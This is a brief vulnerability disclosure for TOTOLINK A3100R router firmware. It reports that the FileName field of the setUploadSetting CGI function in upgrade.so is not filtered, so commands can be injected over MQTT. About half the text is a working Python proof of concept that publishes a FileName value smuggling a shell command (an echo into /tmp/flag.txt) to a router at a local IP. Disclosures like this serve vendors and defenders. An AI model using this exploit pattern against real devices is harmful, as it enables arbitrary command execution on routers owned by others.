Firmware Version: A3100R_V4.1.2cu.5247_B20211129
You can download the firmware here: Swind1er/Download (github.com)
Vulnerability Proof of Concept Video:
https://github.com/Swind1er/Video/raw/main/A3100R_setUploadSetting_RCE%20poc.mp4
In the cgi function setUploadSetting
of the file /lib/cste_modules/upgrade.so
, the string content of the user input field FileName
is not filtered. Sending a malicious FileName
field using the MQTT service leads to arbitrary command execution.
import paho.mqtt.client as mqtt
client = mqtt.Client()
client.connect("192.168.138.128",1883,60)
client.publish('totolink/router/setting/setUploadSetting',
payload='{"topicurl":"setting/setUploadSetting",\
"FileName":";echo \'123\'>>/tmp/flag.txt;echo"}')